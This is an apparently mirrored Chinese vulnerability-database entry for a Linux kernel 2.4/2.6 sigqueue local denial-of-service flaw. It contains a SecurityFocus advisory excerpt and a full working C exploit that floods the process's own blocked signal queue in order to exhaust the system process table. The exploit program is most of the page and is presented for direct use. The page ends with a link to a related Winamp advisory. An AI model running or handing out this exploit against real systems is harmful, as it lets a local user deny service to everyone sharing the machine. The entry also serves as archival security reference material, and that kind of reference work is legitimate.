Linux Kernel 2.4/2.6 – Sigqueue Blocking Denial of Service

Linux Kernel 2.4/2.6 – Sigqueue Blocking Denial of Service

漏洞ID 1054443 漏洞类型
发布时间 2004-04-12 更新时间 2004-04-12
图片[1]-Linux Kernel 2.4/2.6 – Sigqueue Blocking Denial of Service-安全小百科CVE编号 N/A
图片[2]-Linux Kernel 2.4/2.6 – Sigqueue Blocking Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23946
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/10096/info

A vulnerability has been reported in the Linux Kernel that may permit a malicious local user to affect a system-wide denial of service condition. This issue may be triggered via the Kernel signal queue (struct sigqueue) and may be exploited to exhaust the system process table by causing an excessive number of threads to be left in a zombie state.
*/


#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
 
int main()
{
	sigset_t set;
	int i;
	pid_t pid;

	sigemptyset(&set);
	sigaddset(&set, 40);
	sigprocmask(SIG_BLOCK, &set, 0);

	pid = getpid();
	for (i = 0; i < 1024; i++)
		kill(pid, 40);

	while (1)
		sleep(1);
}

相关推荐: NullSoft Winamp in_mod.dll Plug-in Heap Overflow Vulnerability

NullSoft Winamp in_mod.dll Plug-in Heap Overflow Vulnerability 漏洞ID 1098634 漏洞类型 Boundary Condition Error 发布时间 2004-04-05 更新时间 200…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享